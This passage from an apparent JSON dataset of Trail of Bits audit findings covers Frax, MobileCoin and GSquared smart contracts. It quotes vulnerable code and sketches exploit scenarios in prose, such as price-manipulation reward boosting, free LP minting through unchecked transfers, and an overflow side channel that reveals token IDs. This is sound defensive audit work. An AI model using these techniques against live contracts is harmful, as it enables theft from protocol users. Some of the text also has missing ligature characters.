more accurate way to calculate the above... return frax_tally.div( 2 ); } Figure 19.1: contracts/Staking/FraxUniV3Farm_Volatile.sol#L241-L263 In addition, the value of Uniswap V2 LP tokens is calculated incorrectly. The return value of getReserves is vulnerable to manipulation, as described in TOB-FRSOL-006 . Thus, the value should not be used to price LP tokens, as the value will vary signicantly when trades are performed through the given pool. Imprecise uctuations in the LP tokens values will result in an inaccurate global collateral value. function lpTokenInfo ( address pair_address ) public view returns ( uint256 [ 4 ] memory return_info) { // Instantiate the pair IUniswapV2Pair the_pair = IUniswapV2Pair(pair_address); // Get the reserves uint256 [] memory reserve_pack = new uint256 []( 3 ); // [0] = FRAX, [1] = FXS, [2] = Collateral ( uint256 reserve0 , uint256 reserve1 , ) = (the_pair.getReserves()); { // Get the underlying tokens in the LP address token0 = the_pair.token0(); address token1 = the_pair.token1(); // Test token0 if (token0 == canonical_frax_address) reserve_pack[ 0 ] = reserve0; else if (token0 == canonical_fxs_address) reserve_pack[ 1 ] = reserve0; else if (token0 == arbi_collateral_address) reserve_pack[ 2 ] = reserve0; // Test token1 if (token1 == canonical_frax_address) reserve_pack[ 0 ] = reserve1; else if (token1 == canonical_fxs_address) reserve_pack[ 1 ] = reserve1; else if (token1 == arbi_collateral_address) reserve_pack[ 2 ] = reserve1; } Figure 19.2: contracts/Misc_AMOs/__CROSSCHAIN/Arbitrum/SushiSwapLiquidityAMO_ARBI.sol #L196-L217 Exploit Scenario The value of LP positions does not reect a sharp decline in the market value of the underlying tokens. Rather than incentivizing recollateralization, the protocol continues to mint FRAX tokens and causes the true collateralization ratio to fall even further. Although the protocol appears to be solvent, due to incorrect valuations, it is not. Recommendations Short term, discontinue the use of LP tokens as collateral since the valuations are inaccurate and misrepresent the amount of collateral backing FRAX. Long term, use oracles to derive the fair value of LP tokens. For Uniswap V2, this means using the constant product to compute the value of the underlying tokens independent of the spot price. For Uniswap V3, this means using oracles to determine the current composition of the underlying tokens that the NFT represents. References Christophe Michel, \"Pricing LP tokens | Warp Finance hack\" Alpha Finance, \"Fair Uniswap's LP Token Pricing\"", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: Low" + ] + }, + { + "title": "20. Missing check of return value of transfer and transferFrom ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", + "body": "Some tokens, such as BAT, do not precisely follow the ERC20 specication and will return false or fail silently instead of reverting. Because the codebase does not consistently use OpenZeppelins SafeERC20 library, the return values of calls to transfer and transferFrom should be checked. However, return value checks are missing from these calls in many areas of the code, opening the TWAMM contract (the time-weighted automated market maker) to severe vulnerabilities. function provideLiquidity(uint256 lpTokenAmount) external { require (totalSupply() != 0 , 'EC3' ); //execute virtual orders longTermOrders.executeVirtualOrdersUntilCurrentBlock(reserveMap); //the ratio between the number of underlying tokens and the number of lp tokens must remain invariant after mint uint256 amountAIn = lpTokenAmount * reserveMap[tokenA] / totalSupply(); uint256 amountBIn = lpTokenAmount * reserveMap[tokenB] / totalSupply(); ERC20(tokenA).transferFrom( msg.sender , address( this ), amountAIn); ERC20(tokenB).transferFrom( msg.sender , address( this ), amountBIn); [...] Figure 20.1: contracts/FPI/TWAMM.sol#L125-136 Exploit Scenario Frax deploys the TWAMM contract. Pools are created with tokens that do not revert on failure, allowing an attacker to call provideLiquidity and mint LP tokens for free; the attacker does not have to deposit funds since the transferFrom call fails silently or returns false . Recommendations Short term, x the instance described above. Then, x all instances detected by slither . --detect unchecked-transfer . Long term, review the Token Integration Checklist in appendix D and integrate Slither into the projects CI pipeline to prevent regression and catch new instances proactively.", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: Low" + ] + }, + { + "title": "21. A rewards distributor does not exist for each reward token ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", + "body": "The FraxUnifiedFarmTemplate contracts setGaugeController function (gure 21.1) has the onlyTknMgrs modier. All other functions with the onlyTknMgrs modier set a value in an array keyed only to the calling token managers token index. Except for setGaugeController , which sets the global rewards_distributor state variable, all other functions that set global state variables have the onlyByOwnGov modier. This modier is stricter than onlyTknMgrs , in that it cannot be called by token managers. As a result, any token manager can set the rewards distributor that will be used by all tokens. This exposes the underlying issue: there should be a rewards distributor for each token instead of a single global distributor, and a token manager should be able to set the rewards distributor only for her token. function setGaugeController ( address reward_token_address , address _rewards_distributor_address , address _gauge_controller_address ) external onlyTknMgrs(reward_token_address) { gaugeControllers[rewardTokenAddrToIdx[reward_token_address]] = _gauge_controller_address; rewards_distributor = IFraxGaugeFXSRewardsDistributor(_rewards_distributor_address); } Figure 21.1: The setGaugeController function ( FraxUnifiedFarmTemplate.sol#639642 ) Exploit Scenario Reward manager A calls setGaugeController to set his rewards distributor. Then, reward manager B calls setGaugeController to set his rewards distributor, overwriting the rewards distributor that A set. Later, sync is called, which in turn calls retroCatchUp . As a result, distributeRewards is called on Bs rewards distributor; however, distributeRewards is not called on As rewards distributor. Recommendations Short term, replace the global rewards distributor with an array that is indexed by token index to store rewards distributors, and ensure that the system calls distributeRewards on all reward distributors within the retroCatchUp function. Long term, ensure that token managers cannot overwrite each others settings.", + "labels": [ + "Trail of Bits", + "Severity: Undetermined", + "Difficulty: Medium" + ] + }, + { + "title": "22. minVeFXSForMaxBoost can be manipulated to increase rewards ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", + "body": "minVeFXSForMaxBoost is calculated based on the current spot price when a user stakes Uniswap V2 LP tokens. If an attacker manipulates the spot price of the pool prior to staking LP tokens, the reward boost will be skewed upward, thereby increasing the amount of rewards earned. The attacker will earn outsized rewards relative to the amount of liquidity provided. function fraxPerLPToken () public view returns ( uint256 ) { // Get the amount of FRAX 'inside' of the lp tokens uint256 frax_per_lp_token ; // Uniswap V2 // ============================================ { [...] uint256 total_frax_reserves ; ( uint256 reserve0 , uint256 reserve1 , ) = (stakingToken.getReserves()); Figure 22.1: contracts/Staking/FraxCrossChainFarmSushi.sol#L242-L250 function userStakedFrax ( address account ) public view returns ( uint256 ) { return (fraxPerLPToken()).mul(_locked_liquidity[account]).div(1e18); } function minVeFXSForMaxBoost ( address account ) public view returns ( uint256 ) { return (userStakedFrax(account)).mul(vefxs_per_frax_for_max_boost).div(MULTIPLIER_PRECISION ); } function veFXSMultiplier ( address account ) public view returns ( uint256 ) { if ( address (veFXS) != address ( 0 )){ // The claimer gets a boost depending on amount of veFXS they have relative to the amount of FRAX 'inside' // of their locked LP tokens uint256 veFXS_needed_for_max_boost = minVeFXSForMaxBoost(account); [...] Figure 22.2: contracts/Staking/FraxCrossChainFarmSushi.sol#L260-L272 Exploit Scenario An attacker sells a large amount of FRAX through the incentivized Uniswap V2 pool, increasing the amount of FRAX in the reserve. In the same transaction, the attacker calls stakeLocked and deposits LP tokens. The attacker's reward boost, new_vefxs_multiplier , increases due to the large trade, giving the attacker outsized rewards. The attacker then swaps his tokens back through the pool to prevent losses. Recommendations Short term, do not use the Uniswap spot price to calculate reward boosts. Long term, use canonical and audited rewards contracts for Uniswap V2 liquidity mining, such as MasterChef.", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: Medium" + ] + }, + { + "title": "23. Most collateral is not directly redeemable by depositors ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", + "body": "The following describes the on-chain situation on December 20, 2021. The Frax stablecoin has a total supply of 1.5 billion FRAX. Anyone can mint new FRAX tokens by calling FraxPoolV3.mintFrax and paying the necessary amount of collateral and FXS. Conversely, anyone can redeem his or her FRAX for collateral and FXS by calling FraxPoolV3.redeemFrax . However, the Frax team manually moves collateral from the FraxPoolV3 contract into AMO contracts in which the collateral is used to generate yield. As a result, only $5 million (0.43%) of the collateral backing FRAX remains in the FraxPoolV3 contract and is available for redemption. If those $5 million are redeemed, the Frax Finance team would have to manually move collateral from the AMOs to FraxPoolV3 to make further redemptions possible. Currently, $746 million (64%) of the collateral backing FRAX is managed by the ConvexAMO contract. FRAX owners cannot access the ConvexAMO contract, as all of its operations can be executed only by the Frax team. Exploit Scenario Owners of FRAX want to use the FraxPoolV3 contracts redeemFrax function to redeem more than $5 million worth of FRAX for the corresponding amount of collateral. The redemption fails, as only $5 million worth of USDC is in the FraxPoolV3 contract. From the redeemers' perspectives, FRAX is no longer exchangeable into something worth $1, removing the base for its stable price. Recommendations Short term, deposit more FRAX into the FraxPoolV3 contract so that the protocol can support a larger volume of redemptions without requiring manual intervention by the Frax team. Long term, implement a mechanism whereby the pools can retrieve FRAX that is locked in AMOs to pay out redemptions.", + "labels": [ + "Trail of Bits", + "Severity: Undetermined", + "Difficulty: Medium" + ] + }, + { + "title": "24. FRAX.globalCollateralValue counts FRAX as collateral ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", + "body": "Each unit of FRAX represents $1 multiplied by the collateralization ratio of debt. That is, if the collateralization ratio is 86%, the Frax Protocol owes each holder of FRAX $0.86. Instead of accounting for this as a liability, the protocol includes this debt as an asset backing FRAX. In other words, FRAX is backed in part by FRAX. Because the FRAX.globalCollateralValue includes FRAX as an asset and not debt, the true collateralization ratio is lower than stated, and users cannot redeem FRAX for the underlying collateral in mass for reasons beyond those described in TOB-FRSOL-023 . This issue occurs extensively throughout the code. For instance, the amount FRAX in a Uniswap V3 liquidity position is included in the contracts collateral value. function TotalLiquidityFrax () public view returns ( uint256 ) { uint256 frax_tally = 0 ; Position memory thisPosition; for ( uint256 i = 0 ; i < positions_array.length; i++) { thisPosition = positions_array[i]; uint128 this_liq = thisPosition.liquidity; if (this_liq > 0 ){ uint160 sqrtRatioAX96 = TickMath.getSqrtRatioAtTick(thisPosition.tickLower); uint160 sqrtRatioBX96 = TickMath.getSqrtRatioAtTick(thisPosition.tickUpper); if (thisPosition.collateral_address > 0x853d955aCEf822Db058eb8505911ED77F175b99e ){ // if address(FRAX) < collateral_address, then FRAX is token0 frax_tally = frax_tally.add(LiquidityAmounts.getAmount0ForLiquidity(sqrtRatioAX96, sqrtRatioBX96, this_liq)); } else { frax_tally = frax_tally.add(LiquidityAmounts.getAmount1ForLiquidity(sqrtRatioAX96, sqrtRatioBX96, this_liq)); } } } Figure 24.1: contracts/Misc_AMOs/UniV3LiquidityAMO_V2.sol#L199-L216 In another instance, the value of FRAX in FRAX/token liquidity positions on Arbitrum is counted as collateral. Again, FRAX should be counted as debt and not collateral. function lpTokenInfo ( address pair_address ) public view returns ( uint256 [ 4 ] memory return_info) { // Instantiate the pair IUniswapV2Pair the_pair = IUniswapV2Pair(pair_address); // Get the reserves uint256 [] memory reserve_pack = new uint256 []( 3 ); // [0] = FRAX, [1] = FXS, [2] = Collateral ( uint256 reserve0 , uint256 reserve1 , ) = (the_pair.getReserves()); { // Get the underlying tokens in the LP address token0 = the_pair.token0(); address token1 = the_pair.token1(); // Test token0 if (token0 == canonical_frax_address) reserve_pack[ 0 ] = reserve0; else if (token0 == canonical_fxs_address) reserve_pack[ 1 ] = reserve0; else if (token0 == arbi_collateral_address) reserve_pack[ 2 ] = reserve0; // Test token1 if (token1 == canonical_frax_address) reserve_pack[ 0 ] = reserve1; else if (token1 == canonical_fxs_address) reserve_pack[ 1 ] = reserve1; else if (token1 == arbi_collateral_address) reserve_pack[ 2 ] = reserve1; } // Get the token rates return_info[ 0 ] = (reserve_pack[ 0 ] * 1e18) / (the_pair.totalSupply()); return_info[ 1 ] = (reserve_pack[ 1 ] * 1e18) / (the_pair.totalSupply()); return_info[ 2 ] = (reserve_pack[ 2 ] * 1e18) / (the_pair.totalSupply()); // Set the pair type (used later) if (return_info[ 0 ] > 0 && return_info[ 1 ] == 0 ) return_info[ 3 ] = 0 ; // FRAX/XYZ else if (return_info[ 0 ] == 0 && return_info[ 1 ] > 0 ) return_info[ 3 ] = 1 ; // FXS/XYZ else if (return_info[ 0 ] > 0 && return_info[ 1 ] > 0 ) return_info[ 3 ] = 2 ; // FRAX/FXS else revert( \"Invalid pair\" ); } Figure 24.2: contracts/Misc_AMOs/__CROSSCHAIN/Arbitrum/SushiSwapLiquidityAMO_ARBI.sol #L196-L229 Exploit Scenario Users attempt to redeem FRAX for USDC, but the collateral backing FRAX is, in part, FRAX itself, and not enough collateral is available for redemption. The collateralization ratio does not accurately reect when the protocol is insolvent. That is, it indicates that FRAX is fully collateralized in the scenario in which 100% of FRAX is backed by FRAX. Recommendations Short term, revise FRAX.globalCollateralValue so that it does not count FRAX as collateral, and ensure that the protocol deposits the necessary amount of collateral to ensure the collateralization ratio is reached. Long term, after xing this issue, continue reviewing how the protocol accounts for collateral and ensure the design is sound.", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: Low" + ] + }, + { + "title": "17. Univ3LiquidityAMO defaults the price of collateral to $1 ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", + "body": "The Uniswap V3 AMOs default to a price of $1 unless an oracle is set, and it is not clear whether an oracle is or will be set. If the contract lacks an oracle, the contract will return the number of collateral units instead of the price of collateral, meaning that it will value each unit of collateral at $1 instead of the correct price. While this may not be an issue for stablecoins, this pattern is error-prone and unclear. It could introduce errors in the global collateral value of FRAX since the protocol may underestimate (or overestimate) the value of the collateral if the price is above (or below) $1. col_bal_e188 is the balance, not the price, of the tokens. When collatDolarValue is called without an oracle, the contract falls back to valuing each token at $1. function freeColDolVal() public view returns ( uint256 ) { uint256 value_tally_e18 = 0 ; for ( uint i = 0 ; i < collateral_addresses.length; i++){ ERC20 thisCollateral = ERC20(collateral_addresses[i]); uint256 missing_decs = uint256 ( 18 ).sub(thisCollateral.decimals()); uint256 col_bal_e18 = thisCollateral.balanceOf( address ( this )).mul( 10 ** missing_decs); uint256 col_usd_value_e18 = collatDolarValue(oracles[collateral_addresses[i]], col_bal_e18); value_tally_e18 = value_tally_e18.add(col_usd_value_e18); } return value_tally_e18; } Figure 17.1: contracts/Misc_AMOs/UniV3LiquidityAMO_V2.sol#L161-L171 function collatDolarValue (OracleLike oracle, uint256 balance ) public view returns ( uint256 ) { if ( address (oracle) == address ( 0 )) return balance; return balance.mul(oracle.read()).div( 1 ether); } Figure 17.2: contracts/Misc_AMOs/UniV3LiquidityAMO_V2.sol#L174-L177 Exploit Scenario The value of a collateral token is $0.50. Instead of incentivizing recollateralization, the protocol indicates that it is adequately collateralized (or overcollateralized). However, the price of the collateral token is half the $1 default value, and the protocol needs to respond to the insucient collateral backing FRAX. Recommendations Short term, integrate the Uniswap V3 AMOs properly with an oracle, and remove the hard-coded price assumptions. Long term, review and test the eect of each pricing function on the global collateral value and ensure that the protocol responds correctly to changes in collateralization. 18. calc_withdraw_one_coin is vulnerable to manipulation Severity: High Diculty: High Type: Data Validation Finding ID: TOB-FRSOL-018 Target: MIM_Convex_AMO.sol", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: Medium" + ] + }, + { + "title": "25. Setting collateral values manually is error-prone ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", + "body": "During the audit, the Frax Solidity team indicated that collateral located on non-mainnet chains is included in FRAX.globalCollateralValue in FRAXStablecoin , the Ethereum mainnet contract . (As indicated in TOB-FRSOL-023 , this collateral cannot currently be redeemed by users.) Using a script, the team aggregates collateral prices from across multiple chains and contracts and then posts that data to ManualTokenTrackerAMO by calling setDollarBalances . Since we did not have the opportunity to review the script and these contracts were out of scope, we cannot speak to the security of this area of the system. Other issues with collateral accounting and pricing indicate that this process needs review. Furthermore, considering the following issues, this privileged role and architecture signicantly increases the attack surface of the protocol and the likelihood of a hazard: The correctness of the script used to calculate the data has not been reviewed, and users cannot audit or verify this data for themselves. The conguration of the Frax Protocol is highly complex, and we are not aware of how these interactions are tracked. It is possible that collateral can be mistakenly counted more than once or not at all. The reliability of the script and the frequency with which it is run is unknown. In times of market volatility, it is not clear whether the script will function as anticipated and be able to post updates to the mainnet. This role is not explained in the documentation or contracts, and it is not clear what guarantees users have regarding the collateralization of FRAX (i.e., what is included and updated). As of December 20, 2021, collatDollarBalance has not been updated since November 13, 2021 , and is equivalent to fraxDollarBalanceStored . This indicates that FRAX.globalCollateralValue is both out of date and incorrectly counts FRAX as collateral (see TOB-FRSOL-024 ). Recommendations Short term, include only collateral that can be valued natively on the Ethereum mainnet and do not include collateral that cannot be redeemed in FRAX.globalCollateralValue . Long term, document and follow rigorous processes that limit risk and provide condence to users. A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and diculty levels used in this document. Vulnerability Categories Category", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: Low" + ] + }, + { + "title": "1. Project contains vulnerable dependencies ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-07-mobilecoin-securityreview.pdf", + "body": "Running cargo-audit over the codebase revealed that the system under audit uses crates with Rust Security (RustSec) advisories and crates that are no longer maintained. RustSec ID", + "labels": [ + "Trail of Bits", + "Severity: Undetermined", + "Difficulty: High" + ] + }, + { + "title": "2. MobileCoin Foundation could infer token IDs in certain scenarios ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-07-mobilecoin-securityreview.pdf", + "body": "The MobileCoin Foundation is the recipient of all transaction fees and, in certain scenarios, could infer the token ID used in one of multiple transactions included in a block. MCIP-0025 introduced the concept of condential token IDs. The rationale behind the proposal is to allow the MobileCoin network to support tokens other than MOB (MobileCoins native token) in the future. Doing so requires not only that these tokens be unequivocally identiable but also that transactions involving any token, MOB or otherwise, have the same condentiality properties. Before the introduction of the condential tokens feature, all transaction fees were aggregated by the enclave, which created a single transaction fee output per block; however, the same approach applied to a system that supports transfers of tokens other than MOB could introduce information leakage risks. For example, if two users submit two transactions with the same token ID, there would be a single transaction fee output, and therefore, both users would know that they transacted with the same token. To prevent such a leak of information, MCIP-0025 proposes the following: The number of transaction fee outputs on a block should always equal the minimum value between the number of token IDs and the number of transactions in that block (e.g., num_tx_fee_out = min(num_token_ids, num_transactions)). This essentially means that a block with a single transaction will still have a single transaction fee output, but a block with multiple transactions with the same token ID will have multiple transaction fee outputs, one with the aggregated fee and the others with a zero-value fee. Finally, it is worth mentioning that transaction fees are not paid in MOB but in the token that is being transacted; this creates a better user experience, as users do not need to own MOB to send tokens to other people. While this proposal does indeed preserve the condentiality requirement, it falls short in one respect: the receiver of all transaction fees in the MobileCoin network is the MobileCoin Foundation, meaning that it will always know the token ID corresponding to a transaction fee output. Therefore, if only a single token is used in a block, the foundation will know the token ID used by all of the transactions in that block. Exploit Scenario Alice and Bob use the MobileCoin network to make payments between them. They send each other multiple payments, using the same token, and their transactions are included in a single block. Eve, who has access to the MobileCoin Foundations viewing key, is able to decrypt the transaction fee outputs corresponding to that block and, because no other token was used inside the block, is able to infer the token that Alice and Bob used to make the payments. Recommendations Short term, document the fact that transaction token IDs are visible to the MobileCoin Foundation. Transparency on this issue will help users understand the information that is visible by some parties. Additionally, consider implementing the following alternative designs: Require that all transaction fees be paid in MOB. This solution would result in a degraded user experience compared to the current design; however, it would address the issue at hand. Aggregate fee outputs across multiple blocks. This solution would achieve only probabilistic condentiality of information because if all those blocks transact in the same token, the foundation would still be able to infer the ID. Long term, document the trade-os between allowing users to pay fees in the tokens they transact with and restricting fee payments to only MOB, and document how these trade-os could aect the condentiality of the system.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "3. Token IDs are protected only by SGX ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-07-mobilecoin-securityreview.pdf", + "body": "Token IDs are intended to be condential. However, they are operated on within an SGX enclave. This is an apparent departure from MobileCoins previous approach of using SGX as an additional security mechanism, not a primary one. Previously, most condential information in MobileCoin was protected by SGX and another security mechanism. Examples include the following: A transactions senders, recipients, and amounts are protected by SGX and ring signatures. The transactions a user interacts with through Fog are protected by both SGX and oblivious RAM. However, token IDs are protected by SGX alone. (An example in which a token ID is operated on within an enclave appears in gure 3.1.) Thus, the incorporation of condential tokens seems to represent a shift in MobileCoins security posture. let token_id = TokenId::from(tx.prefix.fee_token_id); let minimum_fee = ct_min_fees .get(&token_id) .ok_or(TransactionValidationError::TokenNotYetConfigured)?; Figure 3.1: consensus/enclave/impl/src/lib.rs#L239-L243 Exploit Scenario Mallory learns of a vulnerability that allows her to see inside of an SGX enclave. Mallory uses the vulnerability to observe the token IDs used in transactions in a MobileCoin enclave that she runs. Recommendations Short term, document the fact that token IDs are not oered the same level of security as other aspects of MobileCoin. This will help set users expectations regarding the condentiality of their information (i.e., whether it could be revealed to an attacker). Long term, continue to investigate solutions to the security problems surrounding the condential tokens feature. A solution that does not reveal token IDs to the enclave could exist.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "4. Nonces are not stored per token ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-07-mobilecoin-securityreview.pdf", + "body": "Mint and mint conguration transaction nonces are not distinguished by the tokens with which they are associated. Malicious minters or governors could use this fact to conduct denial-of-service attacks against other minters and governors. The relevant code appears in gures 4.1 and 4.2. For each type of transaction, nonces are inserted into a seen_nonces set without regard to the token indicated in the transaction. let mut seen_nonces = BTreeSet::default(); let mut validated_txs = Vec::with_capacity(mint_config_txs.len()); for tx in mint_config_txs { // Ensure all nonces are unique. if !seen_nonces.insert(tx.prefix.nonce.clone()) { return Err(Error::FormBlock(format!( \"Duplicate MintConfigTx nonce: {:?}\", tx.prefix.nonce ))); } Figure 4.1: consensus/enclave/impl/src/lib.rs#L342-L352 let mut mint_txs = Vec::with_capacity(mint_txs_with_config.len()); let mut seen_nonces = BTreeSet::default(); for (mint_tx, mint_config_tx, mint_config) in mint_txs_with_config { // The nonce should be unique. if !seen_nonces.insert(mint_tx.prefix.nonce.clone()) { return Err(Error::FormBlock(format!( \"Duplicate MintTx nonce: {:?}\", mint_tx.prefix.nonce ))); } Figure 4.2: consensus/enclave/impl/src/lib.rs#L384-L393 Note that the described attack could be made worse by how nonces are intended to be used. The following passage from the white paper suggests that nonces are generated deterministically from public data. Generating nonces in this way could make them easy for an attacker to predict. When submitting a MintTx, we include a nonce to protect against replay attacks, and a tombstone block to prevent the transaction from being nominated indenitely, and these are committed to the chain. (For example, in a bridge application, this nonce may be derived from records on the source chain, to ensure that each deposit on the source chain leads to at most one mint.) Exploit Scenario Mallory (a minter) learns that Alice (another minter) intends to submit a mint transaction with a particular nonce. Mallory submits a mint transaction with that nonce rst, making Alices invalid. Recommendations Short term, store nonces per token, instead of all together. Doing so will prevent the denial-of-service attack described above. Long term, when adding new data to blocks or to the blockchain conguration, carefully consider whether it should be stored per token. Doing so could help to prevent denial-of-service attacks.", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: High" + ] + }, + { + "title": "5. Clients have no option for verifying blockchain conguration ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-07-mobilecoin-securityreview.pdf", + "body": "Clients have no way to verify whether the MobileCoin node they connect to is using the correct blockchain conguration. This exposes users to attacks, as detailed in the white paper: Similarly to how the nodes ensure that they are similarly congured during attestation, (by mixing a hash of their conguration into the responder id used during attestation), the peer- to-node attestation channels could also do this, so that users can fail to attest immediately if malicious manipulation of conguration has occurred. The problem with this approach is that the users have no particularly good source of truth around the correct runtime conguration of the services. The problem that users have no particularly good source of truth could be solved by publishing the latest blockchain conguration via a separate channel (e.g., a publicly accessible server). Furthermore, allowing users to opt in to such additional checks would provide additional security to users who desire it. Exploit Scenario Alice falls victim to the attack described in the white paper. The attack would have been thwarted had Alice known that the node she connected to was not using the correct blockchain conguration. Recommendations Short term, make the current blockchain conguration publicly available, and allow nodes to attest to clients using their conguration. Doing so will help security-conscious users to better protect themselves. Long term, avoid withholding data from clients during attestation. Adopt a general principle that if data should be included in node-to-node attestation, then it should be included in node-to-client attestation as well. Doing so will help to ensure the security of users.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "6. Condential tokens cannot support frequent price swings ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-07-mobilecoin-securityreview.pdf", + "body": "The method for determining tokens minimum fees has limited applicability. In particular, it cannot support tokens whose prices change frequently. In principle, a tokens minimum fee should be comparable in value to the MOB minimum fee. Thus, if a tokens price increases relative to the price of MOB, the tokens minimum fee should decrease. Similarly, if a tokens price decreases relative to the price of MOB, the tokens minimum fee should increase. However, an enclave sets its fee map from the blockchain conguration during initialization (gure 6.1) and does not change the fee map thereafter. Thus, the enclave would seem to have to be restarted if its blockchain conguration and fee map were to change. This fact implies that the current setup cannot support tokens whose prices shift frequently. fn enclave_init( &self, peer_self_id: &ResponderId, client_self_id: &ResponderId, sealed_key: &Option, blockchain_config: BlockchainConfig, ) -> Result<(SealedBlockSigningKey, Vec)> { // Check that fee map is actually well formed FeeMap::is_valid_map(blockchain_config.fee_map.as_ref()).map_err(Error::FeeMap)?; // Validate governors signature. if !blockchain_config.governors_map.is_empty() { let signature = blockchain_config .governors_signature .ok_or(Error::MissingGovernorsSignature)?; let minting_trust_root_public_key = Ed25519Public::try_from(&MINTING_TRUST_ROOT__KEY[..]) .map_err(Error::ParseMintingTrustRootPublicKey)?; minting_trust_root_public_key .verify_governors_map(&blockchain_config.governors_map, &signature) .map_err(|_| Error::InvalidGovernorsSignature)?; } self.ct_min_fee_map .set(Box::new( blockchain_config.fee_map.as_ref().iter().collect(), )) .expect(\"enclave was already initialized\"); Figure 6.1: consensus/enclave/impl/src/lib.rs#L454-L483 Exploit Scenario MobileCoin integrates token T. The value of T decreases, but the minimum fee remains the same. Users pay the minimum fee, resulting in lost income to the MobileCoin Foundation. Recommendations Short term, accept only tokens with a history of price stability. Doing so will ensure that the new features are used only with tokens that can be supported. Long term, consider including two inputs in each transaction, one for the token transferred and one to pay the fee in MOB, as suggested in TOB-MCCT-2.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "7. Overow handling could allow recovery of transaction token ID ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-07-mobilecoin-securityreview.pdf", + "body": "The systems fee calculation could overow a u64 value. When this occurs, the fee is divided up into multiple smaller fees, each tting into a u64 value. Under certain conditions, this behavior could be abused to reveal whether a token ID is used in a block. The relevant code appears in gure 7.1. The hypothetical attack is described in the exploit scenario below. loop { let output_fee = min(total_fee, u64::MAX as u128) as u64; outputs.push(mint_output( config.block_version, &fee_recipient, FEES_OUTPUT_PRIVATE_KEY_DOMAIN_TAG.as_bytes(), parent_block, &transactions, Amount { value: output_fee, token_id, }, outputs.len(), )); total_fee -= output_fee as u128; if total_fee == 0 { break; } } Figure 7.1: consensus/enclave/impl/src/lib.rs#L855-L873 Exploit Scenario Mallory is a (malicious) minter of token T. Suppose B is a recently minted block whose total number of fee outputs is equal to the number of tokens, which is less than the number of transactions in B. Further suppose that Mallory wishes to determine whether B contains a transaction involving T. Mallory does the following: 1. She puts her node into its state just prior to the minting of B. 2. She mints to herself a quantity of T worth u64::MAX / min_fee * min_fee. Call this quantity F. 3. She submits to her node a transaction with a fee of F. 4. She allows the block to be minted. 5. She observes the number of fee outputs in the modied block, B: a. b. If B does not contain a transaction involving T, then B contains a fee output for T equal to zero, and B contains a fee output for T equal to F. If B does contain a transaction involving T, then B contains a fee output for T equal to at least min_fee, and B contains two fee outputs for T, one of which is equal to u64::MAX. Thus, by observing the number of outputs in B, Mallory can determine whether B contains a transaction involving T. Recommendations Short term, require the total supply of all incorporated tokens not to exceed a u64 value. Doing so will eliminate the possibility of overow and prevent the attack described above. Long term, consider incorporating randomness into the number of fee outputs generated. This could provide an alternative means of preventing the attack in a way that still allows for overow. Alternatively, consider including two inputs in each transaction, one for the token transferred and one to pay the fee in MOB, as suggested in TOB-MCCT-2.", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: High" + ] + }, + { + "title": "1. Unbounded loop can cause denial of service ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-10-GSquared-securityreview.pdf", + "body": "Under certain conditions, the withdrawal code will loop, permanently blocking users from getting their funds. The beforeWithdraw function runs before any withdrawal to ensure that the vault has sucient assets. If the vault reserves are insucient to cover the withdrawal, it loops over each strategy, incrementing the _ strategyId pointer value with each iteration, and withdrawing assets to cover the withdrawal amount. 643 644 645 646 { 647 function beforeWithdraw ( uint256 _assets , ERC20 _token) internal returns ( uint256 ) // If reserves dont cover the withdrawal, start withdrawing from strategies 648 649 650 651 652 653 654 655 656 657 658 659 660 661 662 if (_assets > _token.balanceOf( address ( this ))) { uint48 _strategyId = strategyQueue.head; while ( true ) { address _strategy = nodes[_strategyId].strategy; uint256 vaultBalance = _token.balanceOf( address ( this )); // break if we have withdrawn all we need if (_assets <= vaultBalance) break ; uint256 amountNeeded = _assets - vaultBalance; StrategyParams storage _strategyData = strategies[_strategy]; amountNeeded = Math.min(amountNeeded, _strategyData.totalDebt); // If nothing is needed or strategy has no assets, continue if (amountNeeded == 0 ) { continue ; } Figure 1.1: The beforeWithdraw function in GVault.sol#L643-662 However, during an iteration, if the vault raises enough assets that the amount needed by the vault becomes zero or that the current strategy no longer has assets, the loop would keep using the same strategyId until the transaction runs out of gas and fails, blocking the withdrawal. Exploit Scenario Alice tries to withdraw funds from the protocol. The contract may be in a state that sets the conditions for the internal loop to run indenitely, resulting in the waste of all sent gas, the failure of the transaction, and blocking all withdrawal requests. Recommendations Short term, add logic to i ncrement the _strategyId variable to point to the next strategy in the StrategyQueue before the continue statement. Long term, use unit tests and fuzzing tools like Echidna to test that the protocol works as expected, even for edge cases.", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: Low" + ] + }, + { + "title": "2. Lack of two-step process for contract ownership changes ", + "html_url": 